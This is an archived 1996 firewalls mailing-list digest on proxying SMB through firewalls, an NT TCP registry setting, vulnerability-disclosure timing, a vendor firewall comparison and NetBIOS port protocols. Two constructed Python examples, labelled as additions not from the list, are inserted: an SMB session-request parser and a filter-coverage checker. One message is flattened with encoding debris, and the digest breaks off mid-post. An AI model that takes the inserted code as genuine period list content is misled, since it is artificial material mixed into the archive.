I've written about this on the firewalls mailing list before, I think. Basically, you can use a plug-board proxy (plug-gw from fwtk, e.g.), to proxy 139/tcp through the firewall to your destination machine. Unfortunately, given the dumb nature of a generic tcp proxy, you can only connect to one outside system from a given inside system. If that will meet your needs, the challenge is getting the internal client to connect to the proxying firewall when you want to connect to the external system. I accomplished this by putting the firewall's internal IP address on the external system's name in the LMHOSTS file. I.e., make the internal client think that the firewall _is_ the external server. You might be able to play similar games with WINS, though I've not tried it.

You need to have the client think it's really connecting to the external server because the SMB connection protocol includes the server's name. NT servers (in my experience) will reject a connection if the name in the connection message does not match its own sense of itself.

The Samba Unix client for sharing files with NT (and other MS) clients is not so picky. If it gets a connection request for a share or a service it's offering from an authenticated user, it doesn't care what the host name in the connection request is. When going through a firewall to a Samba server from an NT workstation, I just made the connection to "\\firewall\sharename", e.g., and got a good connection to the Samba server on the outside.

Given that the hostname of the server is contained in the connection request, it ought to be possible to write an SMB-specific proxy that would read the hostname in the connection request it's proxying to determine where to make the end connection. It could then be configured to allow or deny any combination of clients and servers. I'm unaware of any such proxy. You'd still have to trick the client to make the connection to the firewall, unless you were using transparent proxy technology as implemented in certain commercial proxying firewalls.

WARNING: It appears to me through experiments I've conducted that NT wants the entire connection request in a single packet, entirely contrary to the streaming nature of TCP. When testing with a proxy that reencapsulated the data into smaller IP packets, the NT server read the first packet, recognized it as the beginning of an incomplete connection request, and sent back an error before reading the 2nd packet containing the remainder of the connection request. This must be an error; TCP is a streaming protocol and how the data is delivered between multiple packets should be irrelevant to a correctly written application. Interestingly enough, the Unix Samba package worked properly through this same proxy.

It's easy to visualize a programming error that causes the improper behaviour I've seen with NT. (No, I don't recall the exact release and service pack numbers on the NT system on which I've observed this.)

One security advantage of proxies over packet filters is that the proxy re-encapsulates the data into new packets, so no IP options, fragmentations, etc., on the incoming stream's packets appear on the outbound side. As TCP is a streaming protocol without any message boundaries being needed by or available to the applications, it shouldn't matter whether or not the proxy sends the data in the same number of packets of the same size as on its receiving side.

Russ Cooper (I think) sent me some configuration suggestions to try on the NT system to see if it could be made to behave properly in this scenario, but I've never had a chance to try them and see if it helps. I'm sure I have his message around here somewhere, but I cannot find it right now. If he sees this, perhaps he'll repeat it to the list.

--
KH

From firewalls-owner Tue Jul 16 13:03:53 1996
Received: (majordom@localhost) by miles.greatcircle.com (8.7.1-lists/Lists-960417-1) id MAA14385 for firewalls-outgoing; Tue, 16 Jul 1996 12:59:42 -0700 (PDT)
Received: from mail.rc.toronto.on.ca ([207.6.29.231]) by miles.greatcircle.com (8.7.4/Miles-951221-1) with SMTP id MAA14378 for ; Tue, 16 Jul 1996 12:59:35 -0700 (PDT)
Received: by mail.rc.toronto.on.ca with SMTP (Microsoft Exchange Server Internet Mail Connector Version 4.0.979.0)
Message-ID:
From: Russ
To: "'Ken Hardy'" , "'gdo@shellus.com'"
Cc: "'Firewalls'"
Subject: RE: Windows NT & Firewalls
Date: Tue, 16 Jul 1996 15:54:12 -0400
X-Mailer: Microsoft Exchange Server Internet Mail Connector Version 4.0.979.0
MIME-Version: 1.0
Content-Type: text/plain; charset="us-ascii"
Content-Transfer-Encoding: 7bit
Sender: firewalls-owner@GreatCircle.COM
Precedence: bulk

Ken said...
"Russ Cooper (I think) sent me some configuration suggestions to try on the NT system to see if it could be made to behave properly in this scenario, but I've never had a chance to try them and see if it helps. I'm sure I have his message around here somewhere, but I cannot find it right now. If he sees this, perhaps he'll repeat it to the list."

>Try changing the following entry in your registry and see if this changes
>NT's behaviour with respect to your proxy. I suspect it will.
>
>Cheers,
>Russ
>
>
>HKEY_LOCAL_MACHINE
>  \SYSTEM
>    \CurrentControlSet
>      \Services
>        \Tcpip
>          \Parameters
>
>Value:   EnablePMTUBHDetect  REG_DWORD
>Range:   0 or 1
>Default: 0 (false)
>
>Setting this parameter to 1 (True) causes TCP to try and detect "Black Hole"
>routers while doing Path MTU Discovery. A "Black Hole" router does not return
>ICMP Destination Unreachable messages when it needs to fragment a TCP packet
>with the Don't Fragment bit set. TCP depends on receiving these messages to
>perform Path MTU Discovery. With this feature enabled, TCP will try to send
>segments without the Don't Fragment bit set if several retransmissions of a
>segment go unacknowledged. If the segment is acknowledged as a result, the
>MSS will be decreased and the Don't Fragment bit will be set in future
>packets on the connection. Enabling black hole detection increases the
>maximum number of retransmissions performed for a given segment.
>
>Cheers,
>Russ
>...running MS Exchange Server 4.0 on NT 4.0, the future is here now.
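The SMB-aware proxy Ken Hardy sketches above, and the whole-request-in-one-segment problem he and Russ discuss, as an added example that is not from the list: it decodes the NetBIOS session request (RFC 1002) a client sends on 139/tcp before any SMB traffic, buffers it until it is complete so the proxy can forward it in a single write, and uses the CALLED name together with the client address to decide which outside server (if any) the session may reach. The policy table, host names and addresses are constructed for the example.

```python
"""Added example (not from the list archive): front end of an SMB-aware proxy.

A NetBIOS session request (RFC 1002) is the first thing a client sends on
139/tcp.  It carries the CALLED name, i.e. the server the client believes it
is talking to, so a proxy can pick the real destination per client/server
pair instead of one fixed target per inside host.  The reader also buffers
the request until all of it has arrived, so the proxy can forward it in one
write instead of in whatever pieces TCP delivered.  All names, addresses
and the policy table are constructed for this example.
"""
import struct
from typing import Dict, Optional, Tuple

SESSION_REQUEST = 0x81   # message type byte of a NetBIOS SESSION REQUEST
NB_NAME_LEN = 16         # 15 characters, space padded, plus one suffix byte
SERVER_SUFFIX = 0x20     # suffix a client uses for the file server service
HEADER_LEN = 4           # type, flags, 16-bit length


def encode_netbios_name(name: str, suffix: int = SERVER_SUFFIX) -> bytes:
    """Second-level encode a name: length 0x20, 32 chars 'A'..'P', 0x00 end."""
    raw = name.upper().encode("ascii").ljust(NB_NAME_LEN - 1, b" ")
    raw += bytes([suffix])
    if len(raw) != NB_NAME_LEN:
        raise ValueError("NetBIOS names are at most 15 characters")
    out = bytearray([32])
    for byte in raw:                       # each nibble becomes one letter
        out.append(0x41 + (byte >> 4))
        out.append(0x41 + (byte & 0x0F))
    out.append(0)
    return bytes(out)


def decode_netbios_name(blob: bytes, offset: int = 0) -> Tuple[str, int, int]:
    """Decode one encoded name at offset; return (name, suffix, next offset)."""
    end = offset + 2 + 2 * NB_NAME_LEN
    if len(blob) < end or blob[offset] != 32 or blob[end - 1] != 0:
        raise ValueError("truncated or malformed NetBIOS name")
    enc = blob[offset + 1:end - 1]
    raw = bytearray()
    for hi, lo in zip(enc[0::2], enc[1::2]):
        if not (0x41 <= hi <= 0x50 and 0x41 <= lo <= 0x50):
            raise ValueError("invalid first-level encoding")
        raw.append(((hi - 0x41) << 4) | (lo - 0x41))
    return raw[:15].decode("ascii").rstrip(" "), raw[15], end


def build_session_request(called: str, calling: str) -> bytes:
    """What a client sends first on 139/tcp (used here to construct input)."""
    payload = encode_netbios_name(called) + encode_netbios_name(calling, 0x00)
    flags = (len(payload) >> 16) & 0x01    # bit 0 extends the length to 17 bits
    header = struct.pack(">BBH", SESSION_REQUEST, flags, len(payload) & 0xFFFF)
    return header + payload


class SessionRequestReader:
    """Accumulates client bytes until one complete session request is present."""

    def __init__(self) -> None:
        self.buf = bytearray()

    def feed(self, data: bytes) -> Optional[Dict[str, object]]:
        """Return the parsed request once all of it has arrived, else None."""
        self.buf += data
        if len(self.buf) < HEADER_LEN:
            return None
        msg_type, flags, length = struct.unpack(">BBH", self.buf[:HEADER_LEN])
        length |= (flags & 0x01) << 16
        if msg_type != SESSION_REQUEST:
            raise ValueError("expected SESSION REQUEST, got type 0x%02x" % msg_type)
        if len(self.buf) < HEADER_LEN + length:
            return None                    # rest is still in flight; keep waiting
        payload = bytes(self.buf[HEADER_LEN:HEADER_LEN + length])
        called, called_sfx, off = decode_netbios_name(payload, 0)
        calling, calling_sfx, off = decode_netbios_name(payload, off)
        if off != length:
            raise ValueError("trailing bytes in session request")
        raw = bytes(self.buf[:HEADER_LEN + length])
        del self.buf[:HEADER_LEN + length]  # anything left belongs to the SMB stream
        return {"called": called, "called_suffix": called_sfx,
                "calling": calling, "calling_suffix": calling_sfx, "raw": raw}


# Constructed policy: (inside client address, CALLED name) -> outside server.
POLICY: Dict[Tuple[str, str], str] = {
    ("10.1.2.3", "SAMBA-OUT"): "192.0.2.10",
    ("10.1.2.3", "NTSRV1"): "192.0.2.11",
}


def choose_target(client_ip: str, request: Dict[str, object],
                  policy: Dict[Tuple[str, str], str] = POLICY) -> Optional[str]:
    """Real server for this client and CALLED name, or None to refuse the session."""
    if request["called_suffix"] != SERVER_SUFFIX:
        return None                        # only file-server sessions are proxied
    return policy.get((client_ip, str(request["called"])))


if __name__ == "__main__":
    # Simulate the request arriving in two TCP segments, as through Ken's proxy.
    req = build_session_request("SAMBA-OUT", "WS-42")
    reader = SessionRequestReader()
    print(reader.feed(req[:10]))           # None: still waiting for the rest
    parsed = reader.feed(req[10:])
    print(parsed["called"], "->", choose_target("10.1.2.3", parsed))
```

Once `feed` returns, the proxy holds the whole request in `raw` and can hand it to the chosen server in one write, which is the condition Ken observed NT to require.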
>

From firewalls-owner Tue Jul 16 14:23:15 1996
Received: (majordom@localhost) by miles.greatcircle.com (8.7.1-lists/Lists-960417-1) id OAA17751 for firewalls-outgoing; Tue, 16 Jul 1996 14:06:43 -0700 (PDT)
Received: from gw.genre.com (genre.com [204.149.79.2]) by miles.greatcircle.com (8.7.4/Miles-951221-1) with SMTP id OAA17734 for ; Tue, 16 Jul 1996 14:06:24 -0700 (PDT)
Received: by gw.genre.com id AA12570
Received: by gw.genre.com (Internal Mail Agent-2);
Message-Id: <9607162102.AA9122@grcstm-nx02.genre.com>
Received: by gw.genre.com (Internal Mail Agent-1);
To: "David J. Meltzer"
Cc: firewalls
From: ygerman
Date: 16 Jul 96 16:59:31
Subject: Re: CERT Advisories (was: Re: Dirty dogs)
Mime-Version: 1.0
Content-Type: Text/Plain
Sender: firewalls-owner@GreatCircle.COM
Precedence: bulk

> One way to actually know what is going on is to get on the 'cracker' web
> sites, bbs's, IRC's
> and fix the problems before they are released in CERT.
>
>CERT is certainly not a single resource to be relied upon as it is often
>several months behind the mailing lists and only selectively issues
>advisories on problems. Still, that is not grounds for sending security
>conscious admins off on a wild goose chase. If you have been so successful
>in infiltrating the things you speak of and have found information that
>has not been available through reading relevant mailing lists, I suppose you
>have numerous unpublished exploits you are protecting your systems with?

I have not sent any admins on wild goose chases. It is just that a lot of the mailing lists you mentioned also seem to hide the information. I would wish there was a list where the people would be pre-registered like with my firewall vendor list or the way you have a secure mailing list through ISS. So that there are only Sysadmins/security people on the list and free sharing of security holes could be accomplished without worrying about a cracker sitting on the list getting information.

As for numerous unpublished exploits part... I do not have any more than anyone else does but I was able to find out and close one or two of the past security holes prior to a CERT announcement or being mentioned on the lists. The point I was trying to make is that WE ARE PLAYING CATCH-UP due to a lack of timely information.

From firewalls-owner Tue Jul 16 15:25:30 1996
Received: (majordom@localhost) by miles.greatcircle.com (8.7.1-lists/Lists-960417-1) id OAA19951 for firewalls-outgoing; Tue, 16 Jul 1996 14:47:37 -0700 (PDT)
Received: (mcb@localhost) by miles.greatcircle.com (8.7.4/Miles-951221-1) id OAA19930 for firewalls@greatcircle.com; Tue, 16 Jul 1996 14:47:16 -0700 (PDT)
Received: from nacg.trane.com (nacg.trane.com [198.80.4.199]) by miles.greatcircle.com (8.7.4/Miles-951221-1) with SMTP id LAA08818 for ; Tue, 16 Jul 1996 11:56:53 -0700 (PDT)
Received: by nacg.trane.com id AA09232
Message-Id: <199607161853.AA09232@nacg.trane.com>
Received: by nacg.trane.com (Internal Mail Agent-1);
From: "Norton, Dave"
To: Firewalls-post
Subject: 'ntsecurity' list ref
Date: Tue, 16 Jul 96 13:54:00 PDT
X-Mailer: Microsoft Mail V3.0
Sender: firewalls-owner@GreatCircle.COM
Precedence: bulk

Howdy,

Just lately, someone instructed that sending:

subscribe ntsecurity [your mailbox@whatever]

to: majordomo@iss.net gets one on the list... Cool... Real normal... But it doesn't work... Could someone tell me what I'm missing here?

I get a 'majordomo-owner' results notice of failure, with instructions of how to get more info from majordomo@iss.net. When I do a 'lists' query, sure enough there's "ntsecurity"... Then when I do an 'info ntsecurity' query, I get "no data available for ntsecurity"... I don't get it.

Can someone shed some light here for me?

Thanx...
dnorton@trane.com

From firewalls-owner Tue Jul 16 15:27:23 1996
Received: (majordom@localhost) by miles.greatcircle.com (8.7.1-lists/Lists-960417-1) id OAA19799 for firewalls-outgoing; Tue, 16 Jul 1996 14:45:36 -0700 (PDT)
Received: (mcb@localhost) by miles.greatcircle.com (8.7.4/Miles-951221-1) id OAA19770 for firewalls@greatcircle.com; Tue, 16 Jul 1996 14:45:22 -0700 (PDT)
Received: from pegase.total.fr (pegase.total.fr [146.249.152.2]) by miles.greatcircle.com (8.7.4/Miles-951221-1) with SMTP id DAA06370 for ; Tue, 16 Jul 1996 03:38:09 -0700 (PDT)
Received: from tidtest.total.fr (tidtest.total.fr [146.249.165.73]) by pegase.total.fr (8.6.8/8.6.6) with SMTP id MAA29669; Tue, 16 Jul 1996 12:34:56 +0200
Received: by tidtest.total.fr (4.1/SMI-4.1)
Message-Id: <9607161033.AA19480@tidtest.total.fr>
To: alexf@iss.net
Cc: firewalls@greatcircle.com
Subject: Re: NT Backoffice "Catapult" firewall certified?
In-Reply-To: Your message of "Thu, 11 Jul 1996 10:57:05 -0000."
Date: Tue, 16 Jul 1996 12:33:31 +0100
From: Michel Lavondes
Sender: firewalls-owner@GreatCircle.COM
Precedence: bulk

In message <199607111455.KAA24217@phoenix.iss.net>, "Alex F" writes:
>
> Please pay attention to the above line and do not attempt to
> subscribe the address my@email.address
>
> Yes, several people did this by mistake :) (oops)
>

The funniest similar problem I heard of was ~ 6 months ago, when someone subscribed a whole mailing list to itself, eg : "subscribe firewalls firewalls@greatcircle.com"

*DON'T TRY THIS AT HOME* :-)

Back to the regularly scheduled subscribe requests

Michel Lavondes (lavondes@tidtest.total.fr)
#include
Governments are guilty until proved innocent

From firewalls-owner Tue Jul 16 15:40:55 1996
Received: (majordom@localhost) by miles.greatcircle.com (8.7.1-lists/Lists-960417-1) id PAA21857 for firewalls-outgoing; Tue, 16 Jul 1996 15:19:52 -0700 (PDT)
Received: from mail.rc.toronto.on.ca ([207.6.29.231]) by miles.greatcircle.com (8.7.4/Miles-951221-1) with SMTP id PAA21837 for ; Tue, 16 Jul 1996 15:19:41 -0700 (PDT)
Received: by mail.rc.toronto.on.ca with SMTP (Microsoft Exchange Server Internet Mail Connector Version 4.0.979.0)
Message-ID:
From: Russ
To: "'David J. Meltzer'" , "'ygerman'"
Cc: "'firewalls'"
Subject: RE: CERT Advisories (was: Re: Dirty dogs)
Date: Tue, 16 Jul 1996 18:14:17 -0400
X-Mailer: Microsoft Exchange Server Internet Mail Connector Version 4.0.979.0
MIME-Version: 1.0
Content-Type: text/plain; charset="us-ascii"
Content-Transfer-Encoding: 7bit
Sender: firewalls-owner@GreatCircle.COM
Precedence: bulk

ygerman said...

> "I have not sent any admins on wild goose chases. It is just that a lot of
>the mailing lists you mentioned also seem to hide the information. I would
>wish there was a list where the people would be pre-registered like with my
>firewall vendor list or the way you have a secure mailing list through ISS.
>So that there are only Sysadmins/security people on the list and free sharing
>of security holes could be accomplished without worrying about a cracker
>sitting on the list getting information."

Russ says...

You're not seriously suggesting that many Black Hats don't work in the security industry, are you? Are we back to the thread on polygraphs again? Just because someone has a registered email address, or works for a reputable company, or has purchased a Firewall product, does not translate to someone you can trust with your inner-most secrets!!! This sounds like the thread about the Satan application form! There is no way you will have a secure mailing list, ever!, not in the sense that you imagine.

The only issue is whether or not CERT (or some other list) posts information about hacks (or attempts) before, or after, a fix has been made by the vendor(s) in question. Someone from CERT previously spoke up about this in a thread at the beginning of the year (check the archives). If I can try to summarize, their opinion was simply that it didn't make a whole lot of sense to tell the world (since it's impossible to have a secure mailing list), that a hole exists in a piece of code prior to the vendor figuring out how to plug it. Sure, by doing so they put the pressure on the vendor to make a fix quickly, but at the same time they also expose the possible exploit to people who might otherwise not have figured it out yet, thereby leading to more exploits of the hole. Besides, putting pressure on the vendors neither guarantees a quick fix, nor a reliable one.

Cheers,
Russ
...running MS Exchange Server 4.0 on NT 4.0, the future is here now.
>

From firewalls-owner Tue Jul 16 15:49:41 1996
Received: (majordom@localhost) by miles.greatcircle.com (8.7.1-lists/Lists-960417-1) id OAA19805 for firewalls-outgoing; Tue, 16 Jul 1996 14:45:44 -0700 (PDT)
Received: from mail.airmail.net (server-f.iadfw.net [206.66.12.40]) by miles.greatcircle.com (8.7.4/Miles-951221-1) with SMTP id OAA19751 for ; Tue, 16 Jul 1996 14:45:12 -0700 (PDT)
Received: by mail.airmail.net (/\##/\ Smail3.1.30.16 #30.73)
Message-Id: <2.2.32.19960716214032.006f409c@raptor1>
X-Sender: dlancaster@raptor1
X-Mailer: Windows Eudora Pro Version 2.2 (32)
Mime-Version: 1.0
Content-Type: text/plain; charset="iso-8859-1"
Content-Transfer-Encoding: quoted-printable
Date: Tue, 16 Jul 1996 16:40:32 -0500
To: Bill Stout
From: Dale Lancaster
Subject: Re: Sidewinder Versus EagleRaptor
Cc: Firewalls@GreatCircle.COM
Sender: firewalls-owner@GreatCircle.COM
Precedence: bulk

Hi Bill,

Good job on the comparison. Though as stated, you need to compare apples to apples. TIS on Unix and Eagle on NT are different animals. Some of the things missing on the Eagle NT are because there is no NT support from the vendors for that missing piece. An example is Secure ID authentication, or running a sendmail server on NT (which I find to be very questionable).
I'll make a few changes below to complete the picture and probably need your feedback on TIS since I don't keep up to speed on every firewall, everyday. regards, Dale Lancaster Senior Systems Engineer Raptor Systems At 09:08 AM 7/12/96 -0700, Bill Stout wrote: >I compared Eagle NT features with Gauntlet (I know, not fair)=20 >and compiling a list of the proxies turned out to be educational. > > Eagle NT 3.0 Gauntlet 3.1 > =B7 Transparent Telnet =B7 Transparent Telnet > =B7 Authenticated Telnet =B7 Authenticated Telnet > =B7 Transparent Http =B7 Transparent Http > =B7 Proxied Http =B7 Proxied Http > =B7 Proxied Gopher =B7 Proxied Gopher > =B7 Transparent FTP =B7 Transparent FTP > =B7 Authenticated FTP =B7 Authenticated FTP > =B7 Transparent SMTP =B7 SMAP/Sendmail > (No sendmail/mail relay =20 > capabilities) =20 The lack of sendmail replay on the NT is because I am not aware of a an actual "sendmail" server for NT. More importantly, I am not sure that we would ever recommend doing that. Sendmail is too buggy to even suggest running it on your firewall (even if one claims to have fixed all the bugs in the quarter million lines of code). That is why we developed the SMTP proxy. It doesn't just patch things through. It filters out unsafe/unnecessary SMTP commands and it also looks for and prevents the buffer overrun addressing attack. Also, the sendmail server on the firewall would slow down the overall performance due to hitting the disk. Our philosophy is to try and never touch the disk. This philosophy seems to have worked since we tested out to be the fastest firewall tested in the DataComm performance testing. > =B7 rlogin > =B7 rsh > =B7 X-11 > =B7 Finger These have been documented everywhere as things you just don't enable. That's why we disable them. Our GSP can generally handle the passage of them. Does the TIS proxy support for this do more than just pass them through? 
Creating a completely separate proxy is not real useful unless it is doing something intelligent like filtering out commands or data that are considered unsafe or opening and closing ports dynamically or performing user authentication. > =B7 Printer > =B7 POP3 Our GSP would handle these. Not sure what a new proxy would do to secure them any further. > =B7 Administrative GUI (info-gw) > A proxy for a admin GUI? I guess you might say we support this in that our current beta release of EagleNT supports the "remote management" feature of the firewall that we have in our Unix version. It uses an encrypted connection back to the firewall. I understand from the LAN/Times article, assuming it is correct, that the most critical functions of the TIS cannot be done from the GUI - not true for our GUI, remote or otherwise. >Non-proxied service for NNTP, Whois, Real Audio, quotd, >(unauthenticated, directionally savvy port 'service(s)'): > > =B7 Proxyd =B7 plug-gw > >Eagle also includes 'Generic pass-through', an unauthenticated,=20 >directionally clueless open port 'service'. Must be the only=20 >'real way' to punch a hole in your firewall. > Actually the GSP is direction aware and must also be allowed by a rule (which can authorize based on src/dst, and time of day. You are right that it does not authenticate on the ports. Mainly because most services that it passes are not authentication aware like NTP, NNTP, POP3, etc. If its an interactive service, then you could probably use our TELNET proxy configured via "Custom Telnet" which allows you to telnet to a port other than 23 and would support authentication. >Authentication methods supported: > > Eagle NT Gauntlet > =B7 S/Key =B7 S/Key > . Password list =B7 Enigma Logistics devices > =B7 SecureID (Security= Dynamics) > =B7 SecurNet (Digital= Pathways) > =B7 CryptoCard > =B7 DigiPass > As noted before, at the time of the NT port, SecureID did not have support for NT clients. 
I noticed that Cryptocard does support NT now, not sure if that was true at the time of our port. Digital Pathways just announced support for NT in March, I would assume it wasn't really production shipping until a little later. Bottom line, our Unix port supports most of the above except DigiPass and Enigma. The EagleNT version will roll in the others as the vendors support an NT version of their client code (actually a few months later due to development and test time). I would add a few more items to your list (and I will use the current beta version of our EagleNT) to compare against and I don't know the answer for TIS on some of these and have just guessed: Eagle TIS NT version of F/W Yes No (The last I talked to TIS, they did not have an NT port. Another vendor offers a port of TIS on NT, but do not know how it compares to the Unix version). DNS Proxy Yes No (This is the ability to create a split/dual-level DNS on one system. We have found that a very significant portion of customer support is related to debugging someone else's DNS environment. The DNS proxy allows a customer to create the public/private DNS desired, but with one server running on the firewall and with a simpler syntax for the database files). Automatic OS Hardening Yes Not sure (Our software auto-installs and turns off all networking services, disables all user accounts other than administrator/root and turns off IPX and NetBui. It also installs IP level code to perform anti-spoof and anti-source route code. I would guess that the TIS package does not automatically do all this - if it does, great stuff.) Continuous Integrity Check Yes Yes (Where we automatically and continuous checksum our executables (MD-5), continuously check for unauthorized services and continuously disable IP forwarding/routing.) =20 SNMP Traps on logging Yes Not sure (We can notify a central network management station via an SNMP trap for some or all of the log entries.) 
Suspicious Activity Monitoring Yes No (We continuously monitor the firewall for suspicious activity and create alerts and also perform automatic traceroutes back to the source of the suspicious activity). DEC Alpha NT Support Yes No TIS is a good firewall. They wouldn't be in business if it wasn't. The main difference noted in LanTimes is that Raptor is, as a whole, much easier to install and maintain verses a TIS installation. We also directly support the NT port, TIS doesn't (the last time I checked). Best regards, Dale =20 =3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D= =3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D= =3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D= =3D=3D=3D=3D Dale Lancaster Web: www.raptor.com Raptor Systems "The Eagle of Firewalls" dlancaster@raptor.com =09 (214) 423-6212 Eagle - LanTimes "Best of Times" Honor - July 1996 =3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D= =3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D= =3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D= =3D=3D=3D=3D From firewalls-owner Tue Jul 16 15:57:12 1996 Received: (majordom@localhost) by miles.greatcircle.com (8.7.1-lists/Lists-960417-1) id OAA18608 for firewalls-outgoing; Tue, 16 Jul 1996 14:25:54 -0700 (PDT) Received: from rbit.co.za (rbit.co.za [196.7.71.94]) by miles.greatcircle.com (8.7.4/Miles-951221-1) with ESMTP id OAA18546 for ; Tue, 16 Jul 1996 14:25:21 -0700 (PDT) Received: (from johnb@localhost) by rbit.co.za (8.7.3/8.7.3) id XAA12159 for firewalls@greatcircle.com; Tue, 16 Jul 1996 23:22:12 +0200 From: John Betts Message-Id: <199607162122.XAA12159@rbit.co.za> Subject: Re: Ports 137 & 138 To: firewalls@greatcircle.com Date: Tue, 16 Jul 1996 23:22:12 +0200 (SAT) Reply-to: johnb@aztec.co.za Content-Type: text Sender: firewalls-owner@GreatCircle.COM Precedence: bulk Forwarded message: From johnb 
Tue Jul 16 23:21:40 1996 Subject: Re: Ports 137 & 138 To: karlp@ix.netcom.com Date: Tue, 16 Jul 1996 23:21:40 +0200 (SAT) In-Reply-To: <31EBC545.4E3C@ix.netcom.com> from "Karl W. Palachuk" at Jul 16, 96 09:37:25 am Reply-to: johnb@aztec.co.za Content-Type: text Content-Length: 1367 % The old (1993) Microsoft Lan Manager and RFC 1060 define ports 137 and % 138 as udp (rather than tcp) ports. 137 is defined as nbname (net beui % name). 138 is defined as nbdatagram (net beui datagram). % firstly, that is net _bios_ (not beui) datagram... unless of course, my linux box is lying to me..... (My backup statement for this is that netbios runs over ip/ipx/netbeui, and is the transport protocol for LanMan) % Someone might be trying to access these via tcp, but of course that % would fail. % My linux box which runs samba makes netbious connections via tcp... ports 137 and 138 are both listed as both tcp AND udp in my /etc/services... # grep 137 /etc/services netbios-ns 137/tcp nbns netbios-ns 137/udp nbns # grep 138 /etc/services netbios-dgm 138/tcp nbdgm netbios-dgm 138/udp nbdgm ciao -- John P.S. Note netbios, not netbeui... P.P.S. I'm not trying to nit-pick P.P.P.S. Honestly ;) P.P.P.P.S. My mistakes and miss-assumptions are mine, and no-one elses.. if you want to claim them, you have to buy them from me :> -- John Betts, Aztec Internet Services Port Elizabeth, South Africa johnb@aztec.co.za, Tel. +27(0)41 303 475, Fax. +27(0)41 301 052 Authorised Caldera Consultant || Part of the UUNet Group The world is complex. The Sendmail configuration reflects this. -- John Betts, Aztec Internet Services Port Elizabeth, South Africa johnb@aztec.co.za, Tel. +27(0)41 303 475, Fax. +27(0)41 301 052 Authorised Caldera Consultant || Part of the UUNet Group The world is complex. The Sendmail configuration reflects this. 
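Taking John's point one step further: the /etc/services lines above register 137 and 138 for both TCP and UDP, so a filter written on the "NetBIOS is UDP only" assumption leaves the TCP side of those ports open. The block below is an added example and not part of any message in this thread: it parses /etc/services-style lines (the sample is constructed from the grep output above plus the netbios-ssn 139/tcp session-service entry), evaluates a first-match rule list the way a simple stateless packet filter would, and reports which netbios-* port/protocol pairs a rule set still lets through. The Rule format and the two rule sets are assumptions made for the illustration, not any vendor's syntax.

```python
"""Added example: check that a filter covers NetBIOS on both TCP and UDP."""
from __future__ import annotations

from dataclasses import dataclass
from typing import Optional

# Constructed /etc/services excerpt. The 137/138 lines match the grep output
# in the post above; the 139 line is the NetBIOS session service.
SERVICES_SAMPLE = """\
# service-name  port/protocol  [aliases ...]  [# comment]
netbios-ns      137/tcp   nbns
netbios-ns      137/udp   nbns
netbios-dgm     138/tcp   nbdgm
netbios-dgm     138/udp   nbdgm
netbios-ssn     139/tcp   nbssn   # session service
"""


def parse_services(text: str) -> dict[tuple[int, str], str]:
    """Map (port, protocol) -> service name, skipping comments and malformed lines."""
    table: dict[tuple[int, str], str] = {}
    for raw in text.splitlines():
        line = raw.split("#", 1)[0].strip()
        if not line:
            continue
        fields = line.split()
        if len(fields) < 2 or "/" not in fields[1]:
            continue  # not a "name port/proto" line
        port_s, proto = fields[1].split("/", 1)
        table[(int(port_s), proto.lower())] = fields[0]
    return table


@dataclass(frozen=True)
class Rule:
    """Hypothetical stateless filter rule (the format is an assumption)."""
    action: str            # "permit" or "deny"
    proto: str             # "tcp", "udp" or "ip" (ip matches both transports)
    dport: Optional[int]   # None = any destination port

    def matches(self, proto: str, port: int) -> bool:
        proto_ok = self.proto == "ip" or self.proto == proto
        port_ok = self.dport is None or self.dport == port
        return proto_ok and port_ok


def first_match(rules: list[Rule], proto: str, port: int) -> str:
    """First-match semantics with an implicit deny at the end of the list."""
    for rule in rules:
        if rule.matches(proto, port):
            return rule.action
    return "deny"


def unblocked_netbios(services: dict[tuple[int, str], str],
                      rules: list[Rule], prefix: str = "netbios") -> list[tuple[int, str]]:
    """Return the netbios-* (port, proto) pairs that the rule list permits."""
    return sorted((port, proto)
                  for (port, proto), name in services.items()
                  if name.startswith(prefix) and first_match(rules, proto, port) == "permit")


# Weak rule set: blocks only the UDP side, as the "137/138 are UDP" reading suggests.
WEAK_RULES = [Rule("deny", "udp", 137), Rule("deny", "udp", 138), Rule("permit", "ip", None)]

# Corrected rule set: denies the NetBIOS ports regardless of transport.
FIXED_RULES = [Rule("deny", "ip", 137), Rule("deny", "ip", 138), Rule("deny", "ip", 139),
               Rule("permit", "ip", None)]

if __name__ == "__main__":
    svc = parse_services(SERVICES_SAMPLE)
    print("weak rules leave open :", unblocked_netbios(svc, WEAK_RULES))
    print("fixed rules leave open:", unblocked_netbios(svc, FIXED_RULES))
```

Run against the sample, the weak list reports 137/tcp, 138/tcp and 139/tcp as still permitted while the corrected list reports nothing; the same check works against a full /etc/services file read from disk.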
From firewalls-owner Tue Jul 16 16:22:42 1996
Received: (majordom@localhost) by miles.greatcircle.com (8.7.1-lists/Lists-960417-1) id QAA24877 for firewalls-outgoing; Tue, 16 Jul 1996 16:15:46 -0700 (PDT)
Received: from dfw-ix8.ix.netcom.com (dfw-ix8.ix.netcom.com [206.214.98.8]) by miles.greatcircle.com (8.7.4/Miles-951221-1) with SMTP id QAA24864 for ; Tue, 16 Jul 1996 16:15:38 -0700 (PDT)
Received: from EarlEvans.medicalogic.com ([198.107.237.35]) by dfw-ix8.ix.netcom.com (8.6.13/8.6.12) with SMTP id QAA24248 for ; Tue, 16 Jul 1996 16:12:32 -0700
Message-ID: <31EC2239.378A@ix.netcom.com>
Date: Tue, 16 Jul 1996 16:14:01 -0700
From: Earl Evans
Reply-To: e_evans@ix.netcom.com
X-Mailer: Mozilla 3.0b5Gold (Win95; I)
MIME-Version: 1.0
To: firewalls@greatcircle.com
Subject: FW-1: Defining Network Objects
Content-Type: text/plain; charset=us-ascii
Content-Transfer-Encoding: 7bit
Sender: firewalls-owner@GreatCircle.COM
Precedence: bulk

Hi everybody,

